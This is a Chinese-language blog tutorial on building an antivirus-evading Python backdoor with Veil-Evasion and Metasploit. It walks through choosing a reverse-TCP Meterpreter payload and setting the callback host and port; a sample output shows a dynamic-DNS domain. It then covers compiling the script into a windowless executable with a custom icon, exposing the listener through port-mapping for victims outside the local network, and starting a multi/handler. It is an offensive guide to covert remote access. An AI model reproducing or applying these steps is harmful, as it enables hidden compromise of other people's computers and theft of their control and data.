2. 程式人生 > >使用veil-evasion+metasploit生成基於python的後門軟體

使用veil-evasion+metasploit生成基於python的後門軟體

阿新 發佈:2019-01-10

Veil Evasion是一個可執行檔案,它被用來生成Metasploit的payload,能繞過常見殺軟。
Veil-Evasion被原生設計為在kali上,但其實存在python環境的系統上應該都能執行。你可以用命令列輕鬆呼叫Veil-Evasion,按選單選項生成payload。在建立payload的時候,Veil-Evasion會詢問你是否想把payload檔案用Pyinstaller或者Py2Exe轉為可執行檔案。
1、安裝
veil-evasion,kalilinux可以直接 apt-get install veil-evasion,或者直接到官網下載:https://github.com/Veil-Framework/Veil


2、使用
使用

  • 使用use、list可以列出當前可用的模組
  • 這裡寫圖片描述
  • 如果要使用某個模組可以直接輸入 use + 模組的名稱,例如 use python/meterpreter/rev_tcp,或者是直接 use + 模組前面的序號。
  • 使用模組和metasploit的模組 使用很相似
  • options—列出當前可以設定的選項
  • set LHOST,set LPORT,設定相關的埠號和ip(ip也可以是域名,方便外網上線)
  • generate—當ip和埠都設定好了之後就可以生成payload
    生成成功後會顯示如下內容:
    可以到/var/lib/veil-evasion/output/source/這個資料夾下找到生成的python後門指令碼。
 Language:      python
 Payload:       python/meterpreter/rev_tcp
 Required Options:      ARCHITECTURE=32  COMPILE_TO_EXE=N
                        EXPIRE_PAYLOAD=X  LHOST=innovationzkj.imwork.net
                        LPORT=14603  USE_PYHERION=N
 Payload File:      /var/lib/veil-evasion/output/source/fuck1.py
 Handler File
 
:      /var/lib/veil-evasion/output/handlers/fuck1_handler.rc

這個過程實際上是生成了一個python指令碼,我們可以通過pyinstaller將其轉化問exe檔案
下面簡單講一下將python指令碼生成為exe檔案的過程
pyinstaller安裝:
1,下載pyinstaller並解壓(可以去官網下載最新版):
http://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip
2,安裝最新版本的 pywin32-217.win32-py2.7.exe:
http://download.csdn.net/detail/gfsfg8545/6539111
不然會出現錯誤Error: PyInstaller for Python 2.6+ on Windows needs pywin32.
具體安裝過程可以參考這篇博文:
http://blog.csdn.net/hmy1106/article/details/45151409
一般的命令:(cmd進入到pyinstaller的資料夾)
python pyinstaller.py -w –onefile xxx.py(你想轉換的py指令碼)
python pyinstaller.py -w –onefile –icon=”my.ico” xxx.py
關於圖示的設定問題:應該準備四張不同尺寸(具體尺寸參見http://stackoverflow.com/questions/3236115/which-icon-sizes-should-my-windows-applications-icon-include)的png檔案,然後用png2icon(下載)指令碼把它們合成一張icon圖示檔案

3、msf的設定以及veil-evasion的設定:
這裡分兩種情況:
1、內網連線後門
內網比較簡單, veil-evasion裡選定模之後,可以指定LHOST就是你的計算機在內網的ip,然後受控端也在內網,可以直接到/var/lib/veil-evasion/output/handlers/這個目錄下找到相應的msf指令碼,然後執行msfconsole -r “veil生成的msf指令碼檔案”,然後等待目標執行後門就可以了。

2、外網連結後門
這個就需要進行埠對映,我這裡使用了花生殼作為外網埠對映的工具,花生殼的具體操作過程不再贅述。
veil-evasion生成payload的時候,LHOST要設定成你在花生殼上申請的域名(也可以設定從域名指向的ip),LPORT要設定成花生殼分配的那個埠號

花生殼設定的時候,外網域名指向你本機內網的ip地址,和你自己設定的對映埠號。

msf監聽:
1、開啟msf
2、use exploit/multi/handler
3、set PAYLOAD windows/meterpreter/reverse_tcp
4、- set LHOST 你本機內網的ip地 ,set LPORT 你本地監聽的埠
5、explit

相關推薦

使用veil-evasion+metasploit生成基於python後門軟體

Veil Evasion是一個可執行檔案,它被用來生成Metasploit的payload,能繞過常見殺軟。 Veil-Evasion被原生設計為在kali上,但其實存在python環境的系統上應該都能執行。你可以用命令列輕鬆呼叫Veil-Evasio

基於Python實現的四則運算生成程序

個人 目錄 [] class 是否 time 除法 slist 設計實現 Github項目地址:傳送門 小組成員:黃曉彬(代碼實現) 黃鈺城(代碼審查) 需求: 1. 使用 -n 參數控制生成題目的個數。 2. 使用 -r 參數控制題目中數值(自然數、真分數和真分數分母)的

基於python的wordcloud庫生成中文詞雲

安裝 pip install wordcloud -i https://mirrors.aliyun.com/pypi/simple/ wordcloud中主要有三個類: WordCloud([font_path, width, height, …])

keras快速上手-基於python的深度學習實踐_第8章_文字生成原始碼

原始碼如下,但質量較差 # -*- coding: utf-8 -*- #!/usr/bin/env python # coding: utf-8 # # 序列模型 # In[1]: import pandas as pd import numpy as np import gc import ke

keras快速上手-基於python的深度學習實踐_第8章_文字生成源代碼

app 取出 武俠小說 ica 內存 helper per charset bat 源代碼如下,但質量較差 # -*- coding: utf-8 -*- #!/usr/bin/env python # coding: utf-8 # # 序列模型 # In[1]:

免殺後門之MSF&Veil-Evasion的完美結合

本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的專案。利用它我們可以生成繞過殺軟的 payload !kali 上並未安裝,下面我

基於python的網際網路軟體測試開發(自動化測試)-全集合

6   接受捐贈 以上內容都是花費了作者大量的精力進行探索和總結,最後還整理成有體系的學習資料,耗費了比較長的時間和比較大的精力。 今天作者決定將這些資料進行分享主要是:希望讓知識傳播得更多更廣,幫助更多的人,這樣才對得起知識,才尊重了知識。 將知識雪藏起來,讓知識不見天日,讓知識的作用隨著時間的推

基於python的-字典生成

# -*- coding:utf-8 -*- # 字典生成式 list4 = [('name','zhangsan'),('age',22),('phone',110)] # for迴圈遍歷列表,將

簡單分析Veil-Evasion生成的攻擊載荷c/meterpreter/recv_tcp的被控端程式碼

簡單分析Veil-Evasion生成的攻擊載荷c/meterpreter/rev_tcp的被控端程式碼 Veil-Evasion簡介 Veil-Evasion是Veil專案(專案地址https://github.com/Veil-Framework/Veil

基於Python的Selenium自動化(4)—如何生成測試報告

在專案中一般都會使用單元測試框架來對我們的測試程式碼進行管理,python中單元測試框架很多,其中有幾個比較好的單元測試框架,例如:unittest,nose,pytest等。上一篇部落格中介紹了pytest框架的基本使用。這篇文章將介紹的是如何使用pytest

Web驗證碼圖片的生成-基於Java的實現

submit esc page resp ioe 代碼 oge cnblogs pro 驗證碼圖片是由程序動態產生的,每次訪問的內容都是隨機的。那麽如何采用程序動態產生圖片,並能夠顯示在客戶端頁面中呢?原理很簡單,對於java而言,我們首先開發一個Servlet,這個Se

命令行顏色換算器(基於python

documents image document class clas profile 修改 span eight import sys print(hex(int(sys.argv[1])<<16|int(sys.argv[2])<<8|int(

學習《selenium2自動化測試基於python》遇到的問題(一)

pypi tools bsp sel dir python 解決方案 打不開 什麽 問題一: 通過cmd,用Python安裝setuptools時,報錯no module named ‘six‘等類似情況時,解決方案: 翻譯過來就是缺少SIX的模塊,直接到官網打開,下載

電子書 flaskweb開發:基於Python的Web應用開發實戰.pdf

商業 機器 免費 影評 而且 視頻軟件 python程序 規範 初級 作為PythonWeb開發的微框架,Flask獨樹一幟。它不會強迫開發者遵循預置的開發規範,為開發者提供了自由度和創意空間。   《圖靈程序設計叢書·Flask Web開發:基於Python的Web應用開

Web接口開發-基於Python

python3 org nbsp 3.5 src 接口開發 tro -1 eas 首先、理解必知 建議:直接上Python3.x的車 Windows下 安裝Python 3.5.2 安裝包:https://www.python.org/downloads/relea

selenium自動化實戰-基於python語言(二: 編寫腳本)

獲取 pat 打開 border 命令 需要 框架 attribute 一個 上一篇文章說到顯示等待和隱式等待語句,我們繼續學習下面的命令方法。 8. 定位一組元素 這裏書上是自己寫了一個頁面代碼,通過訪問本地這個頁面來舉例。但我覺得找一個現有的頁面自己琢磨更有意思,而且

初試主題模型LDA-基於python的gensim包

rpo nco reload tps 代碼 list sdn str height http://blog.csdn.net/a_step_further/article/details/51176959 LDA是文本挖掘中常用的主題模型,用來從大量文檔中提取出最能表達各個

基於python的接口自動化測試框架

urn __name__ exce 文件格式 圖片 XML pla main tex 公司內部的軟件采用B/S架構,大部分是數據的增刪改查,由於還在開發階段,所以UI界面的變化非常快,難以針對UI進行自動化測試,那樣會消耗大量的精力與時間維護自動化腳本。針對此種情況,針對接

python 爬蟲獲取文件式網站資源(基於python 3.6)

codes 網頁 大小 file sel dal 網頁代碼 目錄 多級目錄 import urllib.requestfrom bs4 import BeautifulSoupfrom urllib.parse import urljoinfrom Cat.findLink

python 爬蟲獲取文件式網站資源完整版(基於python 3.6)

sta 不支持 bytes ror 啟動 www des find parse <--------------------------------下載函數-----------------------------> import requestsimport t